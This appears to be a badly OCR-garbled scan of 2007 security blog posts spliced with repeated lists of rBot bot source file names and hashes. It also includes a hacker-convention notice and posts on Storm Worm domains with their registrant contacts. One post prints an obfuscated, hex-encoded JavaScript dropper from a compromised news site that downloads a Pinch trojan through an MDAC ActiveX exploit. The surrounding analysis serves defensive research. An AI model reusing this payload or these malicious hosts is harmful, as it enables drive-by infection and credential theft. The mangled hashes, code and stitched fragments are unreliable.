aliaslog.cpp 
826a551d0689a4e0846977a91c5d0fe6 
aliaslog.h 
52307a78ef96b5920f5edc93785166c6 
autostart.cpp 
306dd702bbb1613d95cObb1d8c95ae92 
autostart.h 
ce33622adfc7b6e1543361c2a206229f 
avirus.cpp 
15eae314484b841cc21e6698a504d175 
avirus.h e55a156d28fde56a0bb05fc599dafecf 
capture.cpp 
8131417a0ade8b0cd43a6b1a441022dd 


capture.h 
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1a27e95a9451b7b9fde4dd3labbe40c4 
cdkeys.cpp 
3f24656c7e76d36b031a0501f0df9693 
cdkeys.h 10199c0132621d0f86774ae3ea965f6c 
changes.txt 
dd8f4fb15e5968e80df48ca88d1 7ffd2 
configs.h 
46b5c4c8d6e73397935c136e7f209bfc 
crc32.cpp 
3771c5b3f6992c43c0e12a57c41a727e 
crc32.h 
1cd0adeb14bdd0dcbc3fe66a5fe2fed9 
crypt.cpp 
f8d56522e7015cff349715794104c50f 
crypt.h 
O0e8cd32d6c5dbb0546c57d7fd213b365 
dcc.cpp 
bc19d35982b17f731a59c62b1c14c84d 
dcc.h 
€44c57141c37593156064072bd6570c2 
dcom.cpp acea5e7fd1133f94c9e89756c5c0cc27 
dcom.h 
b2792e423f3ec732793723d53a0e12c8 
dcom2.cpp 
0ad20a541269c646caa86e8cef38d708 
dcom2.h 
€9548b20f8d3d955969a8b515b426db4 
ddos.cpp ed0c9b5120f45a2ccb3572139a7d0061 
ddos.h 
b3d1a37538db741825844dfb3df4f7 2f 
defines.h 
1a60597a3d8ee68b3c9e7b602873000F 
download.cpp 

664845639 lLaff5fbb872236bcb0af8b5 
download.h 
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772d831e6b39c79d829d9fc8cdb713a6 
driveinfo.cpp 
9dc1c0a866f906b262d258a8ca3eda9e 
driveinfo.h 
8f57049be20497bca61df57618ba9cfe 
ehandler.cpp 
7f85493a9bae6ab2dad717786502328c 
ehandler.h 
3644e5ec559d2670426689d1c80b0509 
externs.h 
de46029aee975069a6fb9ef3515c2b42 
findfile.cpp 
40273104f4bc7ebcd7f0b87673f39638 
findfile.h 
d21e9ef8155cf3c9efcbe8ec4244357a 
findpass.cpp 
21f63de47f8f0fdb9f989d6463a89032 
findpass.h 
1fecf202e0ebd30610d74f842979c82c 
fphost.cpp 
3b4e036a97dfabcd636e63245831853a 
fphost.h 72b69b3d4234fcbc5da07695ae3483cl1b 
functions.h 
000d108172efd4ble8a4af8a60cal7de 
globals.h 
65ad95c53b660b0fc4bad98f2d2d4b22 
httpd.cpp 
3b321d4bdc50573e2722291788667763 
httpd.h 
288553599c70aa95ec2119d78938578a 
icmpflood.cpp 
5caa21a85ea20819ca40e7454f1ll1lbe33 
icmpflood.h 
4462c6318220648820316848deb124fd 
ident.cpp 
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9f22919c49284e257ce0ed79dbd29bf6 
ident.h 
56c539d97aec2572f6fc9349edd7d9c2 
includes.h 
7d0cOf86b350ab6e2bf1fc68e81aa720 
irc send.cpp 
6a084f0b44846cfbd50498b8b03687e3 
irc _send.h 

30d0176a5e9b6e3e5al 9bfb1fcda444c 
keylogger.cpp 

€569621c990b3 7affc9cf4b050f2df2e 
keylogger.h 
a00df900cf42e596e4c48e8a9d52afed 
list.txt 50594305fa90c9596c69be1ad1a454a4 
loaddlls.cpp 
1186093534flcfb47efd3e4e922c95d4 
loaddlls.h 
4703f87679db3655151348076c41a83a 
Isass.cpp 
ca0873edf0c29f4077aa625f344ea756 
Isass.h 
5b9d615744a8d6f4b2c9c19d2aed46ef 
misc.cpp 4770444fdc75d9baac93b3bc29bfa51f 
misc.h 
f035c1642a8e3ff49ff19bb1be316333 
mssql.cpp 
2ea31bdb396d29250fd6fédbdf231433 
mssql.h 
742394ed531laab2ecc958daf5305723e 
myshellcode.asm 
ce26d85257d8fa2c68a5ad6012ed010c 
net.cpp 
a1193f36f9bc058f9306fa922b957ed9 
net.h 
b1bb95c11a47aa666acd9a5929861726 
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netbios.cpp 
904a4d19d94ab75dbe67e628831c0ef9 
netbios.h 
dd155768799804528c6cd19d67df42a3 
netutils.cpp 
70€91597c24a39f15682b255dc78973d5 
netutils.h 
ccbb3172d63a28dae5a98af36c27e354 
nicklist.h 
e9eb7e67eb89f60039d17c3fc5609ab4 


passwd.h c300d3b2a40113092a84186424b56079 


peer2peer.cpp 
7fa712db3241c69112b7a853516ff0f5 
peer2peer.h 
920cce5177elfcaacdf28ec4aal1c18b1 
pingudp.cpp 
8092a2919dab44410b1802c1b31ddc7a 
pingudp.h 
b86f6921f7a720d6e7b204fbeb34e8d4 
processes.cpp 
Off6cd6325e6f63db3d44355843d4b08 
processes.h 
f7c75cccfaaef0c459ac6c020cf6808d 
psniff.cpp 
c4eb189f05d2a7ff652afeOcdab3bd17 
psniff.h 5eebe93de4e03bf0bb118e35997743a9 
advscan.cpp 
5a6c867004c2ceeb0918b93b6bc82071 
advscan.h 
c67d944559e747clee795c57fb616d8d 
aliaslog.cpp 
826a551d0689a4e0846977a91c5d0fe6 
aliaslog.h 
52307a78ef96b5920f5edc93785166c6 
autostart.cpp 
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306dd702bbb1613d95c0bb1d8c95ae92 
autostart.h 
ce33622adfc7b6e1543361c2a206229f 
avirus.cpp 
15eae314484b841cc21e6698a504d175 
avirus.h e55a156d28fde56a0bb05fc599dafecf 
beagle.cpp 
45ca74ec0aa5d493533ea48bccc7f890 
beagle.h 76fa5d92efdffaadb93a416dc5ffbaf8 
capture.cpp 
8131417a0ade8b0cd43a6b1a441022dd 
capture.h 
1a27e95a9451b7b9fde4dd3labbe40c4 
cdkeys.cpp 
3f24656c7e76d36b031a0501f0df9693 
cdkeys.h 10199c0132621d0f86774ae3ea965f6c 
changes.txt 
58217d1ffd4deblbec06aae7baa89769 
configs.h 
5b44129fadebb952daac2e4c53da3f09 
crc32.cpp 
3771c5b3f6992c43c0e12a57c41a/727e 
crc32.h 
1cd0adeb14bdd0dcbc3fe66a5fe2fed9 
crypt.cpp 
f8d56522e7015cff349715794104c50f 
crypt.h 
Oe8cd32d6c5dbb0546c57d7fd213b365 
dameware.cpp 
f14a8d491f640cb67983ce00b78480d2 
dameware.h 
c5f45e22e790da8dd52d90dd4841b5c7 
dcc.cpp 
bc19d35982b17f731a59c62b1c14c84d 
dcc.h 
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€44c57141c37593156064072bd6570c2 
dcom.cpp acea5e7fd1133f94c9e89756c5c0cc27 
dcom.h 
b2792e423f3ec732793723d53a0e12c8 
dcom2.cpp 
0ad20a541269c646caa86e8cef38d708 
dcom2.h 
€9548b20f8d3d955969a8b515b426db4 
ddos.cpp ed0c9b5120f45a2ccb3572139a7d0061 
ddos.h 
b3d1a37538db741825844dfb3df4f7 2f 
defines.h 
edfee264776272d32fecca8elc3bblea 
download.cpp 

664845639 Laff5fob872236bcb0af8b5 
download.h 
772d831e6b39c79d829d9fc8cdb713a6 
driveinfo.cpp 
9dc1c0a866f906b262d258a8ca3eda9e 
driveinfo.h 
8f57049be20497bca61df57618ba9cfe 
ehandler.cpp 
7f85493a9bae6ab2dad717786502328c 
ehandler.h 
3644e5ec559d2670426689d1c80b0509 
externs.h 
de46029aee975069ab6fb9ef3515c2b42 
findfile.cpp 
40273104f4bc7ebcd7f0b87673f39638 
findfile.h 
d21e9ef8155cf3c9efcbe8ec4244357a 
findpass.cpp 
21f63de47f8f0fdb9f989d6463a89032 
findpass.h 
1fecf202e0ebd30610d74f842979c82c 
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fphost.cpp 
3b4e036a97dfabcd636e63245831853a 
fphost.h 72b9b3d4234fcbc5da07695ae3483cl1b 
functions.h 
000d108172efd4ble8a4af8a60cal7de 
globals.h 
65ad95c53b660b0fc4bad98f2d2d4b22 
httpd.cpp 
3b321d4bdc50573e2722291788667763 
httpd.h 
288553599c70aa95ec2119d78938578a 
icmpflood.cpp 
5caa21a85ea20819ca40e7454f11be33 
icmpflood.h 
4462c6318220648820316848deb124fd 
ident.cpp 
9f22919c49284e257ce0ed79dbd29bf6 
ident.h 
56c539d97aec2572f6fc9349edd7d9c2 
includes.h 
4cb2e277eaee6a70467b72db23e16670 
irc send.cpp 
6a084f0b44846cfbd50498b8b03687e3 
irc _send.h 

30d0176a5e9b6e3e5al 9bfb1fcda444c 
keylogger.cpp 

€569621c990b3 7affc9cf4b050f2df2e 
keylogger.h 
a00df900cf42e596e4c48e8a9d52afed 
kuang2.cpp 
ce5f0f4d470b760d2276fab309878420 
kuang2.h fc3343ecc92dba61f83260bbb93aa70c 
loaddlls.cpp 
1186093534flcfb47efd3e4e922c95d4 
loaddlls.h 
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4703f87679db3655151348076c41a83a 
misc.cpp 4770444fdc75d9baac93b3bc29bfa51f 
misc.h 
f035c1642a8e3ff49ff19bb1be316333 
mssql.cpp 
2ea31bdb396d29250fd6fédbdf231433 
mssql.h 
742394ed531laab2ecc958daf5305723e 
mydoom.cpp 
cfcbabd00798a130fe0366975a9a0f50 
mydoom.h c7d0eda136c75da543c4al14f9c28b7d6 
myshellcode.asm 
ce26d85257d8fa2c68a5ad6012ed010c 
net.cpp 
a1193f36f9bc058f9306fa922b957ed9 
net.h 
b1bb95c11a47aa666acd9a5929861726 
netbios.cpp 
904a4d19d94ab75dbe67e628831c0ef9 
netbios.h 
dd155768799804528c6cd19d67df42a3 
netdevil.cpp 
892dd8fd4a08ede457f9346b5edd832e 
netdevil.h 
a89982a588e965ce01448c60a81585b3 
netutils.cpp 
7€91597c24a39f15682b255dc78973d5 
netutils.h 
ccbb3172d63a28dae5a98af36c27e354 
nicklist.h 
e9eb7e67eb89f60039d17c3fc5609ab4 
optix.cpp 
6c3d9eaf1d647623e49290e2b09874c7 
optix.h 
3421ea53b60d9533328808627b869ccc 
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passwd.h c300d3b2a40113092a84186424b56079 
peer2peer.cpp 
7fa712db3241c69112b7a853516ff0f5 
peer2peer.h 
920cce5177elfcaacdf28ec4aal1c18b1 
pingudp.cpp 
8092a2919dab44410b1802c1b31ddc7a 
pingudp.h 
b86f6921f7a720d6e7b204fbeb34e8d4 
processes.cpp 
Off6cd6325e6f63db3d44355843d4b08 
processes.h 
f7c75cccfaaef0c459ac6c020cf6808d 

psniff.cpp 
c4eb189f05d2a7ff652afeOcdab3bd17 

psniff.h 5eebe93de4e03bf0bb118e35997743a9 
rBot.cpp 44c7b9207eeb15bed6ada960a4b68da8 
rBot.dsp e2de7c5a4460d5b046bf6c33fbc9e457 
rBot.dsw 37a2056d806c2c07d6a5e0ad7a9b75a0 
rBot.h 

6d17278915220464f9502b8ce5451f67 
redirect.cpp 
dacd372119ae0ab1750b3e2f83382a52 
redirect.h 
9e5349d6d6944a179b9ca7a7d847c335 
remotecmd.cpp 
35014f60da50aef7b6a7al19ff893247a 
remotecmd.h 
1fb45492f87a66e34be6b4ca55b1cf86 
reqbuf.bin 
2d8fe918744e0f97f435f973d2af0be4 
rlogind.cpp 
2f26ca25770b2f22201d40541b1d9d29 
rlogind.h 
dbc479f2720ba03cb946419fbef774e0 
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veo: India's own International Hackers’ Convention 


Thanks to all for making this a big success, hope to see more participation and support from 
everyone in future 


——~ 


9th December 2007 
International Convention Center 
Pune, India 


och 1 one of @ kind hackers’ convention in Inde which serves os 2 meeting plece for hackers, security professionsls, lew enforcement 
agencies and all offer securty entfusiasts 


it's 3 1 day Convention mn a upcoming IT hub ‘Pune", ako known as oxford of the east A city fll of hard core coders who huxk ther days at 
tw build fe work!’s best software. 


Core & enjoy fe first ever hackers convention of India, we wekorre you at 


Informative presentations and papers from [1]ClubHack 2007- India’s premier security event : 


"ClubHack is one of its kind hackers’ convention in India which serves as a meeting place for 
hackers, security professionals, law enforcement agencies and all other security enthusiasts." 


[2]Analysis of Adversarial Code: The Role of Malware Kits! 
[3]7 years of Indian Cyber Law - 7 Best Cases 
[4]Vulnerabilities in VoIP Products and Services 

[5]The Future of Automated Web Application Testing 
[6]Faster PwninG Assured: Cracking Crypto with FPGAs 
[7]Legiment Techniques of IPS/IDS Evasion 


[8]Hacking Web 2.0 Art and Science of Vulnerability Detection 
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rndnick.cpp 
89c13d836afadc25fb95c4d69bb627c5 
rndnick.h 
3cbe632d4ca6f1l52ca2a13bb1561d292 
scan.cpp 66cOcfe5563eb8191fda0d9a6781lacOf 
scan.h 

6236be771c0c88df937f75845a064f12 
secure.cpp 
0385d82f95182e40ed61329826da5934 
secure.h 231le3dd2ba09a8bbc039caf634e5306d 
session.cpp 
82e74c83142171a4998ca76b20b4177¢c 
session.h 
5f8c353634b560052a5ebee5ef27ae32 
shellcode.cpp 
b16b4f6éaaf8a8c11822c931dc84f77d4 
shellcode.h 
cal14f267b73bc867b075ca56f524d52e 
socks4.cpp 
7d9d022be20b4dca6a204f8c1e027dbb 
socks4.h b103f307ff02cd98fe2bfbecbd19c011 
sub7.cpp ab416250dc7c47a499f6dd28b99el1ac0 
sub7.h 

c60800f9fecb35bb27384594b46feb22 
synflood.cpp 
d860c99e49b7c19e49c61a21bafOfE6b 
synflood.h 
78df095c5aa59a0bfaa783e6edd38d0d 
sysinfo.cpp 
17375b805605f717739a8085be3f21f3 
sysinfo.h 
38774eadb5ba365df293ba4a222c4163 
tcpflood.cpp 
dd12816e442003152d2f65d42ce7eeb8 
tcpflood.h 
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a9165cc828d623c51c297ec888803d9F 
tcpflood2.cpp 
65eaf8f6e8c69ed36fd175cc89d1644F 
tcpflood2.h 
f8307cc6251c3fce249a794314103804 
tcpip.h 
41b08a9fae20869c4eca0bae6dc2d971 
tftpd.cpp 
e11ccc19202c00c861e229c83b1907a2 
tftpd.h 
01a889b931f69e44f3a9421e16c327bc 
threads.cpp 
cbhe0ba8b50028430092c7f0e78841b71 
threads.h 
4414d669e296201e23ecfabb616f7536 
upnp.cpp 02d082807cbb76759600d516143a214b 
upnp.h 
6be3f6b1cfecla51673271021f67cab6 
visit.cpp 
27fb4f513a944ba46a905c796bce0c81 
visit. 
766e4add98e2cb96bd37e87f4d9dfff9 
webdav.cpp 
3b0fb2d9a7499f1710ef4e7077858533 
webdav.h cblccbbb8ab3884e8e40ddb76a386bad 
wildcard.cpp 
8785f287656995d8621d455ac7e04ab7 
wildcard.h 
64fa15a50564415d397166c3d0aec0a6 
workstation.cpp 
3be726c7f2e4404b198ff5f7042318c7 
workstation.h 
d16ef3f05e153e67803fba8d67532dal 
advscan.cpp 
970e7449a3471ae926733313c79aalfd 
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advscan.h 
c67d944559e747clee795c57fb616d8d 
aliaslog.cpp 
826a551d0689a4e0846977a91c5d0fe6 
aliaslog.h 
52307a78ef96b5920f5edc93785166c6 
autostart.cpp 
306dd702bbb1613d95cObb1d8c95ae92 
autostart.h 
ce33622adfc7b6e1543361c2a206229f 
avirus.cpp 
15eae314484b841cc21e6698a504d175 


avirus.h e55a156d28fde56a0bb05fc599dafecf 


beagle.cpp 
45ca74ec0aa5d493533ea48bccc7f890 


beagle.h 76fa5d92efdffaadb93a416dc5ffbaf8 


capture.cpp 
8131417a0ade8b0cd43a6b1a441022dd 
capture.h 
1a27e95a9451b7b9fde4dd31labbe40c4 
cdkeys.cpp 
3f24656c7e76d36b031a0501f0df9693 


cdkeys.h 10199c0132621d0f86774ae3ea965f6c 


changes.txt 
58217d1ffd4deblbec06aae7baa89769 
configs.h 

2325a339fe87 bfb8dfa846c8eb233258 
crc32.cpp 
3771c5b3f6992c43c0e12a57c41a727e 
crc32.h 
Icd0adeb14bdd0dcbc3fe66a5fe2fed9 
crypt.cpp 
f8d56522e7015cff349715794104c50f 
crypt.h 
Oe8cd32d6c5dbb0546c57d7fd213b365 
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dameware.cpp 
f14a8d491f640cb67983ce00b78480d2 
dameware.h 
c5f45e22e790da8dd52d90dd4841b5c7 
dcc.cpp 
bc19d35982b17f731a59c62b1c14c84d 
dcc.h 
€44c57141c37593156064072bd6570c2 
dcom.cpp acea5e7fd1133f94c9e89756c5c0cc27 
dcom.h 
b2792e423f3ec732793723d53a0e12c8 
dcom2.cpp 
0ad20a541269c646caa86e8cef38d708 
dcom2.h 
€9548b20f8d3d955969a8b515b426db4 
ddos.cpp ed0c9b5120f45a2ccb3572139a7d0061 
ddos.h 
b3d1a37538db741825844dfb3df4f7 2f 
defines.h 
ccl6dafcdeb18ec98celdaa72c00f59d 
download.cpp 

664845639 1lLaff5fbb872236bcb0af8b5 
download.h 
772d831e6b39c79d829d9fc8cdb713a6 
driveinfo.cpp 
9dc1c0a866f906b262d258a8ca3eda9e 
driveinfo.h 
8f57049be20497bca61df57618ba9cfe 
ehandler.cpp 
7f85493a9bae6ab2dad717786502328c 
ehandler.h 
3644e5ec559d2670426689d1c80b0509 
externs.h 
f7¢44e532aca3c1596e004ca03be6db8 
findfile.cpp 
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40273104f4bc7ebcd7f0b87673f39638 
findfile.h 
d21e9ef8155cf3c9efcbe8ec4244357a 
findpass.cpp 
21f63de47f8f0fdb9f989d6463a89032 
findpass.h 
1lfecf202e0ebd30610d74f842979c82c 
fphost.cpp 
3b4e036a97dfabcd636e63245831853a 


fphost.h 7269b3d4234fcbc5da07695ae3483c1b 


functions.h 
000d108172efd4ble8a4af8a60cal7de 
globals.h 
65ad95c53b660b0fc4bad98f2d2d4b22 
httpd.cpp 
3b321d4bdc50573e2722291788667763 
httpd.h 
288553599c70aa95ec2119d78938578a 
icmpflood.cpp 
5caa21a85ea20819ca40e7454f1ll1lbe33 
icmpflood.h 
4462c6318220648820316848deb124fd 
ident.cpp 
9f22919c49284e257ce0ed79dbd29bf6 
ident.h 
56c539d97aec2572f6fc9349edd7d9c2 
includes.h 
d6478f56ee26ac92c9b87cbe49fal446 
irc send.cpp 
6a084f0b44846cfbd50498b8b03687e3 
irc send.h 

30d0176a5e9b6e3e5al 9bfb1lfcda444c 
keylogger.cpp 

€569621c990b3 7affc9cf4b050f2df2e 
keylogger.h 
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a00df900cf42e596e4c48e8a9d52afed 
kuang2.cpp 
ce5f0f4d470b760d2276fab309878420 
kuang2.h fc3343ecc92dba61f83260bbb93aa70c 
list.txt 50594305fa90c9596c69be1ad1a454a4 
loaddlls.cpp 
1186093534flcfb47efd3e4e922c95d4 
loaddlls.h 
4703f87679db3655151348076c41a83a 
Isass.cpp 
359e17604e2b3e438ca9b09ade55c9e5 
Isass.h 
5b9d615744a8d6f4b2c9c19d2aed46ef 
misc.cpp 4770444fdc75d9baac93b3bc29bfa51f 
misc.h 

f035c1642a8e3ff49ff19bb1be316333 
mssql.cpp 
2ea31bdb396d29250fd6fédbdf231433 
mssql.h 
742394ed531laab2ecc958daf5305723e 
mydoom.cpp 
cfcbabd00798a130fe0366975a9a0f50 
mydoom.h c7d0eda136c75da543c4al14f9c28b7d6 
myshellcode.asm 
ce26d85257d8fa2c68a5ad6012ed010c 
net.cpp 

a1193f36f9bc058f9306fa922b957ed9 

net.h 

b1bb95c11a47aa666acd9a5929861726 
netbios.cpp 
904a4d19d94ab75dbe67e628831c0ef9 
netbios.h 
dd155768799804528c6cd19d67df42a3 
netdevil.cpp 
892dd8fd4a08ede457f9346b5edd832e 
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netdevil.h 
a89982a588e965ce01448c60a81585b3 
netutils.cpp 
7€91597c24a39f15682b255dc78973d5 
netutils.h 
ccbb3172d63a28dae5a98af36c27e354 
advscan.cpp 
252b0c459e513da2c606eec0001441c8 
advscan.h 
d5bfa343e80c04d15d6d7b5e9ce92eef 
aliaslog.cpp 
826a551d0689a4e0846977a91c5d0fe6 
aliaslog.h 
52307a78ef96b5920f5edc93785166c6 
autostart.cpp 
db2ce24b9bd3465f36b11f46f644a293 
autostart.h 
ce33622adfc7b6e1543361c2a206229f 
avirus.cpp 
92917e1d8364a7f27fca0ce163c6337a 
avirus.h e55a156d28fde56a0bb05fc599dafecf 
beagle.cpp 
45ca74ec0aa5d493533ea48bccc7f890 
beagle.h 76fa5d92efdffaadb93a416dc5ffbaf8 
capture.cpp 
8131417a0ade8b0cd43a6b1a441022dd 
capture.h 
1a27e95a9451b7b9fde4dd31labbe40c4 
cdkeys.cpp 
3f24656c7e76d36b031a0501f0df9693 
cdkeys.h 10199c0132621d0f86774ae3ea965f6c 
changes.txt 
58217d1ffd4deblbec06aae7baa89769 
configs.h 
203e79f696ca60a14e9bb9e517d0089d 
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Such localized events are always beneficial from a networking and a relationship building per- 
spective. Something bigger is (always) going one though. You may not be aware that, for 
instance, Microsoft have been running the [9]Securewars contest in India for a while, seeking 
to improve the favorability scale and awareness of the company’s activities, to later on improve 
their chances of recruiting the most talented participants. 


. http: //clubhack.com/2007/files/Rahul-Analysis_of_Adversarial_Code.pdf 
. http: //clubhack.com/2007/files/WHITEPAPER-7_years_of_Indian_Cyber_Law. pdf 


VoIP .pd: 
. http: //clubhack.com/2007/files/Amish_Umesh-Future_Of_WebApp_Testing. pdf 


. http: //clubhack.com/2007/files/David-FPGA. pdf 


. bttp://clubhack.com/2007/files/Shreeraj-Hacking Web_2.0.pd 


. http: //www.microsoft.com/india/securewars/ 
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3.12.16 Pinch Variant Embedded Within RussianNews.ru (2007-12-24 04:30) 


<script>function v476ed62a4c966(u476ed62a4d139){ Function v476ed62ahd964 () {var 
v476ed62aheG0d4=16; return ve76ed62ahe 604; } 

return(parselInt(v476ed62a4d139 ,v476ed62a4d904()));}function v476ed62a4e8a4(u476ed62a4F074){ var 
v476ed62a507ee"2; var v4s76ed62a4F844~'"' 5 for (vs76ed62a5 80146; 
v476ed62a5 001 4<u476ed62a4FO74.length; v476ed62a50014+=u476ed62a5 Bee) < 

v476ed62a4F844+=( String .fromCharCode(v476ed62a4C966 ( v476ed62a4F O74. substr(u476ed62a50814, 
v476ed62a587ee))))5}return v476ed62a4F 844; > 

document .write(v476ed62a4e8a4( ' 30534352495 65 42 8606 16E67756167653D226A617661736372697 07 4223E BAGDOA 
6B3D3 638 0A66756E63746 96F 6E2 0606461632829 OA7B 6A76617 22 06879602 0302 6756E65 7363617 06528 2225364625363 
2222B226865222B2225363325373422293B 007661722 87 264736F 26302 8646F 63756D656E742E637265617465456C656D 
656E74286B796C0293B 6A2 62 62 62 67264736F 2E736574417474726962757465282769642720277264736F 27293B0A76617 
220686964312 03D2 6756E65 7363617 06528226360222B22253631253733253733222B22696422293B 0A7661722 0686964 
322 63D26756E657363617 06528226360222B22253733253639253634253341253432222B22443936222B 2225343325333 
§253335253336253244253336253335222B BA2 82 82 62 62 62 62 82 62 62 82 82 82 62 62 82 82 62 62 62 8224133222B2225324425 
3331253331222B2225343425333 025324425 3339253338 2533332228 2241203 622282225333 62534332228 BA2 82 02 62 62 
62 82 82 62 62 62 82 82 62 62 62 82 82 62 62 62225333 6253334253436 253433222B2232222B2225333925343525333325333622 
293B 6A2 82 62 62 87 264736F 2E73657441747472696275746528686964312068696432293B GA A766 1722 06 16.464626F 263 
D203 638 0A7472796A7B 6A76617 22 8686964332 8302 6756E65 7363617 86528226164222B22253646253634253632253245 
253733253734222B227265222B2225363125364422293B 6A7 661722 06 16.464626F 622 0302 07 26.47 36F 2E 4372656174654 
F626A6563742868696433202222293B GA2 62 82 82 0616.46 4626F 20302 631 3B OA7D OA63617463682865297B7D 6A OA696628 
616464626F 26213D2 63129 6A7B GA7 47279 GA2 62 62 62 67B GA7661722 6686964342 6302 6756665736361 7 66528226164222 
B22253646253634253632253245253733253734222B22253732253635222B22616D22293B 6A7661722 86 16464626F 6228 
3D2 06E657720416374697665584F 6266563742868696434293B GA 2 62 62 82 0616.46.46 26F 20302 63138 BA 2 62 82 02 07D BAG 
3617463682865 297B7D GA7D BA BAG 966286 16.46.4626F 2630302 03129 6A7B A747 279 GA2 O62 62 62 B7B OA7661722 068696435 
203D26756E657363617 0652822253533222B 22686560 222B22253643253245253431222B227 87 8222B2225364325 36392 
22B22636174222B2225363925364625364522293B 6A7661722 87368617 67 66F 263028672647 36F 2E4372656174654F 626A 
65637428686 96435 2022222938 687661722 0686964362 6302 8756E65 7363617 06528226D73222B2225373825364425364 
3222B22322E584D222B22253443253438 2535342228225 45 0222938 687661722 86D73786D6F 622 0302 66E657720416374 
69766558 4F 62696563742868696436293B 6A 76617 22 8686964372 63D 2 6756E65 7363617 0652822253437 2228224522282 
2253534222938 GA2 62 62 62 860737 86D6F 622E6F 7 6656E2868696437202268747 47 B3A2F2F7275737369616E6E6577732E 
72752F6172616269632F 646174612F6E6577732F 757 6606F61642F 65787 62F6578652E7 6687 622206661607365293B BA2 
62 62 02 66D73786D6F 622E73656E6428293B GA2 82 62 62 BHA2 G2 82 82 86 16464626F 622E 74797 86526302 93138 6A2 6202020 
616464626F 622E6F 7 06562829 3B BA2 G2 82 02 06 16464626F 622E7772697 4652860737 86D6F 622E7 265737 B6F 6E7365426 


This is a perfect and currently live example demonstrating how a once compromised site 
can also be used as a web dropper compared to the default infection vector mentality 
we’ve been witnessing on pretty much each and every related case of malware embedded 
sites during 2007. The URL at a popular news portal for Russian/Iranian related news at : 
russiannews.ru/arabic/data/news/upload/exp is serving a Pinch variant thought an [1JMDAC 
ActiveX code execution exploit - CVE-2006-0003, the type of virtual Keep it Simple Stupid 
[2]strategy of using outdated vulnerabilities | discussed before. Deobfuscation leads us to : 
russiannews.ru/arabic/data/news/upload/exp/exe.php 


Trojan-PSW.Win32.LdPinch.dzr 

File Size: 22016 bytes 

MD5 : cb0a480fd845632b9c4df0400f512bb3 

SHA1 : 83bb4132d1df8a42603977bd2b1f9c4de07463ab 


What’s important to point out in this case, is that the main index and the pages within 
the site are clean, so instead of trying to infect the visitors, the malicious parties are basically 
using it as a web dropper. Moreover, in the wake of [3]Pinch-ing the Pinch authors, this variant 
generated on the fly courtesy of their tool fully confirms the simple logic that once released in 
the wild, DIY malware builders and [4]open source malware greatly [5]extend their lifecycles 
and possibility for added innovation on behalf of the community behind them. 


1. http: //ddanchev. blogspot .com/2007/12/mdac-activex-code-execution-exploit .htm 


2. http: //ddanchev . blogspot .com/2007/09/popular-web-malware-exploitation.html 
3. http://ddanchev. blogspot .com/2007/12/russias-fsb-vs-cybercrime.htm 
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4. http: //ddanchev. blogspot .com/2007/09/localizing-open-source-malware.htm 
5. http: //ddanchev. blogspot .com/2007/10/mpack-and-icepack-localized-to-chinese. html 


3.12.17 Spreading Malware Around the Christmas Tree (2007-12-25 00:54) 


— . —— * —5 
ae 
he C. SLQUSe 
ra 
Watch these sexy girls give you that special 


Santa Treatment! Each dhe does her best to 
make you really feel the Holiday Spirit! 


an 
Get Your Personal Holiday Strip Show Today 


BoWNLOAD FOR FREE NOW: 


Stormy Wormy is back in the game on the top of Xmas eve, enticing the end users with a 
special Xmas strip show for those who dare to download the binary. The domain merrychrist- 
masdude.com is logically in a fast-flux, here are some more details : 


Administrative, Technical Contact 
Contact Name: John A Cortas 

Contact Organization: John A Cortas 
Contact Street1: Green st 322, fl.10 
Contact City: Toronto 

Contact Postal Code: 12345 

Contact Country: CA 

Contact Phone: +1 435 2312633 

Contact E-mail: cortas2008 @ yahoo.com 


1246 


’ 
v7? 


Name Server: NS.MERRYCHRISTMASDUDE.COM 
Name Server: NS10.MERRYCHRISTMASDUDE.COM 
Name Server: NS13.MERRYCHRISTMASDUDE.COM 
Name Server: NS9.MERRYCHRISTMASDUDE.COM 
Name Server: NS11.MERRYCHRISTMASDUDE.COM 
Name Server: NS3.MERRYCHRISTMASDUDE.COM 
Name Server: NS4.MERRYCHRISTMASDUDE.COM 
Name Server: NS6.MERRYCHRISTMASDUDE.COM 
Name Server: NS2.MERRYCHRISTMASDUDE.COM 
Name Server: NS5.MERRYCHRISTMASDUDE.COM 
Name Server: NS7.MERRYCHRISTMASDUDE.COM 
Name Server: NS8.MERRYCHRISTMASDUDE.COM 
Name Server: NS12.MERRYCHRISTMASDUDE.COM 


The domain also has an embedded IFRAME pointing to merrychristmasdude.com/cgi- 
bin/in.cgi?p=100 where two javascipt obfuscations, courtesy of the Neosploit attack kit 
attempt to load. Current binary (stripshow.exe) has an over 50 % detection rate 17/32 (53.13 
%). Stay tuned, AV vendors will reach another milestone on the number of malware variants 
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detected, [1]despite that [2]compared to [3]the real, massive [4]Storm Worm [5]campaign 
this [6]one is fairly [7]easy to prevent [8]on a large [9]scale. 


Related info - [10]SANS, [11]ASERT, [12]TEMERC, [13]DISOG. 


http: blogspot 
http: blogspot 


ttp://ddanchev. blogspot .com/2007/09/storm-worms-fast-flux-networks.htm 


http: //ddanchev. blogspot .com/2007/09/storm-worms-ddos-attitude.htm 
ttp://ddanchev. blogspot .com/2007/09/storm-worms-ddos-attitude-part-two.htm 


ttp://ddanchev. blogspot .com/2007/11/detecting-and-blocking-russian-business.htm 


: ://ddanchev. .com/2007/02/storm-worm-switching- propagation. htm 
, ://ddanchev. .com/2007/08/storm-worms-use-of-dropped-domains .htm 
. http: //ddanchev. blogspot .com/2007/08/offensive-storm-worm-obfuscation.htm 


. http://isc.sans.org/diary . php?storyid=3778 
11. http://asert .arbornetworks .com/2007/12/storm-is-back-dude/ 
12. http://temerc.blogspot .com/2007/12/merry-x-mas- storm-worm.htm 


. http: //www.disog. org/2007/12/stormworm-is-back-have-merry- christmas .html 
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3.12.18 Riders on the Storm Worm (2007-12-28 17:03) 


During the last couple of days the folks behind Storm Worm have started using several new, 
and highly descriptive domains. It seems they’ve also changed the layout as well, and despite 
that the exploit IFRAME is now gone, automatically registered Blogspot accounts are also 
disseminating links to the domains. Some of these have been registered as of recently, others 
have been around in a blackhat SEO operation for a while and are getting used as a founda- 
tion for the campaign. These are all known Storm Worm fast-fluxed domains for the time being : 


merrychristmasdude.com 
happycards2008.com 
uhavepostcard.com 
newyearwithlove.com 
newyearcards2008.com 
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_happycards2008.com 
Administrative, Technical Contact 

Contact Name: Bill Gudzon 

Contact E-mail: bgudzon1956 @ hotmail.com 
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_uhavepostcard.com 

Administrative, Technical Contact 

Contact Name: Kerry Corsten 

Contact E-mail: kryport2000 @ hotmail.com 
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_newyearwithlove.com 

Administrative, Technical Contact 

Contact Name: Bill Gudzon 

Contact E-mail: bgudzon1956 @ hotmail.com 
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’ 


— 


